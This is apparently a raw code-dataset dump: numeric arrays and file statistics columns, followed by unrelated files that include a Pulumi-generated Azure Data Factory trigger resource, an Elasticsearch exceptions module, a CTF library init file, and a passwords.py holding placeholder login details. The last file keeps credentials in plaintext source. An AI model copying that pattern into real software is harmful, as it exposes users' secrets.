[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 29760, 58128, 20292, 36529, 46594, 42797, 10380],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 17424, 1156, 22337, 9190, 65285]]
| 836.891051 | 844 | 0.388193 | 65,537 | 215,081 | 1.273983 | 0.037368 | 1.445606 | 2.150803 | 2.844358 | 0.864228 | 0.863941 | 0.86327 | 0.862707 | 0.861988 | 0.860994 | 0 | 0.558281 | 0.304713 | 215,081 | 256 | 845 | 840.160156 | 0.00004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
7fe2006099f68deab5c2e110e42a39c2f5e0cfa5 | 272 | py | Python | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | 1 | 2017-05-06T19:33:08.000Z | 2017-05-06T19:33:08.000Z | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | 1 | 2021-06-01T21:44:34.000Z | 2021-06-01T21:44:34.000Z | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | null | null | null | # coding: utf-8
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ConnectionTimeout
from elasticsearch.exceptions import TransportError
from elasticsearch.exceptions import NotFoundError
from urllib3.exceptions import ProtocolError
| 38.857143 | 54 | 0.886029 | 28 | 272 | 8.607143 | 0.464286 | 0.33195 | 0.448133 | 0.547718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008032 | 0.084559 | 272 | 6 | 55 | 45.333333 | 0.959839 | 0.047794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7ff198c6ab244cfbd57eed575eb27a1da860048f | 26,290 | py | Python | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['TriggerTumblingWindowArgs', 'TriggerTumblingWindow']
@pulumi.input_type
class TriggerTumblingWindowArgs:
def __init__(__self__, *,
data_factory_id: pulumi.Input[str],
frequency: pulumi.Input[str],
interval: pulumi.Input[int],
pipeline: pulumi.Input['TriggerTumblingWindowPipelineArgs'],
start_time: pulumi.Input[str],
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
retry: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]] = None):
"""
The set of arguments for constructing a TriggerTumblingWindow resource.
"""
pulumi.set(__self__, "data_factory_id", data_factory_id)
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "interval", interval)
pulumi.set(__self__, "pipeline", pipeline)
pulumi.set(__self__, "start_time", start_time)
if activated is not None:
pulumi.set(__self__, "activated", activated)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if max_concurrency is not None:
pulumi.set(__self__, "max_concurrency", max_concurrency)
if name is not None:
pulumi.set(__self__, "name", name)
if retry is not None:
pulumi.set(__self__, "retry", retry)
if trigger_dependencies is not None:
pulumi.set(__self__, "trigger_dependencies", trigger_dependencies)
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "data_factory_id")
@data_factory_id.setter
def data_factory_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_factory_id", value)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[str]:
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[str]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> pulumi.Input[int]:
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: pulumi.Input[int]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter
def pipeline(self) -> pulumi.Input['TriggerTumblingWindowPipelineArgs']:
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: pulumi.Input['TriggerTumblingWindowPipelineArgs']):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Input[str]:
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: pulumi.Input[str]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter
def activated(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "activated")
@activated.setter
def activated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "activated", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def delay(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def retry(self) -> Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]:
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]:
return pulumi.get(self, "trigger_dependencies")
@trigger_dependencies.setter
def trigger_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]):
pulumi.set(self, "trigger_dependencies", value)
@pulumi.input_type
class _TriggerTumblingWindowState:
def __init__(__self__, *,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']] = None,
retry: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]] = None):
"""
Input properties used for looking up and filtering TriggerTumblingWindow resources.
"""
if activated is not None:
pulumi.set(__self__, "activated", activated)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if data_factory_id is not None:
pulumi.set(__self__, "data_factory_id", data_factory_id)
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if interval is not None:
pulumi.set(__self__, "interval", interval)
if max_concurrency is not None:
pulumi.set(__self__, "max_concurrency", max_concurrency)
if name is not None:
pulumi.set(__self__, "name", name)
if pipeline is not None:
pulumi.set(__self__, "pipeline", pipeline)
if retry is not None:
pulumi.set(__self__, "retry", retry)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if trigger_dependencies is not None:
pulumi.set(__self__, "trigger_dependencies", trigger_dependencies)
@property
@pulumi.getter
def activated(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "activated")
@activated.setter
def activated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "activated", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data_factory_id")
@data_factory_id.setter
def data_factory_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_factory_id", value)
@property
@pulumi.getter
def delay(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def pipeline(self) -> Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']]:
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']]):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter
def retry(self) -> Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]:
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]:
return pulumi.get(self, "trigger_dependencies")
@trigger_dependencies.setter
def trigger_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]):
pulumi.set(self, "trigger_dependencies", value)
class TriggerTumblingWindow(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None,
__props__=None):
"""
Create a TriggerTumblingWindow resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TriggerTumblingWindowArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a TriggerTumblingWindow resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param TriggerTumblingWindowArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TriggerTumblingWindowArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TriggerTumblingWindowArgs.__new__(TriggerTumblingWindowArgs)
__props__.__dict__["activated"] = activated
__props__.__dict__["additional_properties"] = additional_properties
__props__.__dict__["annotations"] = annotations
if data_factory_id is None and not opts.urn:
raise TypeError("Missing required property 'data_factory_id'")
__props__.__dict__["data_factory_id"] = data_factory_id
__props__.__dict__["delay"] = delay
__props__.__dict__["description"] = description
__props__.__dict__["end_time"] = end_time
if frequency is None and not opts.urn:
raise TypeError("Missing required property 'frequency'")
__props__.__dict__["frequency"] = frequency
if interval is None and not opts.urn:
raise TypeError("Missing required property 'interval'")
__props__.__dict__["interval"] = interval
__props__.__dict__["max_concurrency"] = max_concurrency
__props__.__dict__["name"] = name
if pipeline is None and not opts.urn:
raise TypeError("Missing required property 'pipeline'")
__props__.__dict__["pipeline"] = pipeline
__props__.__dict__["retry"] = retry
if start_time is None and not opts.urn:
raise TypeError("Missing required property 'start_time'")
__props__.__dict__["start_time"] = start_time
__props__.__dict__["trigger_dependencies"] = trigger_dependencies
super(TriggerTumblingWindow, __self__).__init__(
'azure:datafactory/triggerTumblingWindow:TriggerTumblingWindow',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None) -> 'TriggerTumblingWindow':
"""
Get an existing TriggerTumblingWindow resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TriggerTumblingWindowState.__new__(_TriggerTumblingWindowState)
__props__.__dict__["activated"] = activated
__props__.__dict__["additional_properties"] = additional_properties
__props__.__dict__["annotations"] = annotations
__props__.__dict__["data_factory_id"] = data_factory_id
__props__.__dict__["delay"] = delay
__props__.__dict__["description"] = description
__props__.__dict__["end_time"] = end_time
__props__.__dict__["frequency"] = frequency
__props__.__dict__["interval"] = interval
__props__.__dict__["max_concurrency"] = max_concurrency
__props__.__dict__["name"] = name
__props__.__dict__["pipeline"] = pipeline
__props__.__dict__["retry"] = retry
__props__.__dict__["start_time"] = start_time
__props__.__dict__["trigger_dependencies"] = trigger_dependencies
return TriggerTumblingWindow(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def activated(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "activated")
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "additional_properties")
@property
@pulumi.getter
def annotations(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "data_factory_id")
@property
@pulumi.getter
def delay(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "delay")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "description")
@property
@pulumi.getter(name="endTime")
def end_time(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "end_time")
@property
@pulumi.getter
def frequency(self) -> pulumi.Output[str]:
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def interval(self) -> pulumi.Output[int]:
return pulumi.get(self, "interval")
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "max_concurrency")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def pipeline(self) -> pulumi.Output['outputs.TriggerTumblingWindowPipeline']:
return pulumi.get(self, "pipeline")
@property
@pulumi.getter
def retry(self) -> pulumi.Output[Optional['outputs.TriggerTumblingWindowRetry']]:
return pulumi.get(self, "retry")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "start_time")
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> pulumi.Output[Optional[Sequence['outputs.TriggerTumblingWindowTriggerDependency']]]:
return pulumi.get(self, "trigger_dependencies")
| 42.678571 | 180 | 0.65542 | 2,781 | 26,290 | 5.944984 | 0.057533 | 0.110446 | 0.137906 | 0.071856 | 0.862396 | 0.836085 | 0.807234 | 0.77808 | 0.751043 | 0.720317 | 0 | 0.000049 | 0.227691 | 26,290 | 615 | 181 | 42.747967 | 0.814224 | 0.04515 | 0 | 0.803607 | 1 | 0 | 0.129014 | 0.055355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164329 | false | 0.002004 | 0.014028 | 0.09018 | 0.276553 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3d43a734242fc6c1949c74a6d80a1aa914366839 | 205 | py | Python | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 30 | 2018-10-10T13:48:22.000Z | 2022-03-14T07:03:57.000Z | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 2 | 2018-10-12T10:05:03.000Z | 2020-05-18T22:53:15.000Z | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 5 | 2018-10-10T16:11:54.000Z | 2021-04-04T13:13:53.000Z | """
A CTF Library
"""
from __future__ import absolute_import, division, print_function
from scryptos.util import *
from scryptos.math import *
from scryptos.crypto import *
from scryptos.wrapper import *
| 20.5 | 64 | 0.785366 | 27 | 205 | 5.740741 | 0.555556 | 0.309677 | 0.348387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136585 | 205 | 9 | 65 | 22.777778 | 0.875706 | 0.063415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e9e6252d46916013ace7c99ad88c162bc18c9b0d | 102 | py | Python | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | 3 | 2016-04-09T07:06:59.000Z | 2017-04-18T02:30:05.000Z | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | null | null | null | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | 1 | 2021-01-25T19:56:41.000Z | 2021-01-25T19:56:41.000Z | details = {'email': 'example@example.com', 'password': 'example', 'recipient': 'example@example.com'}
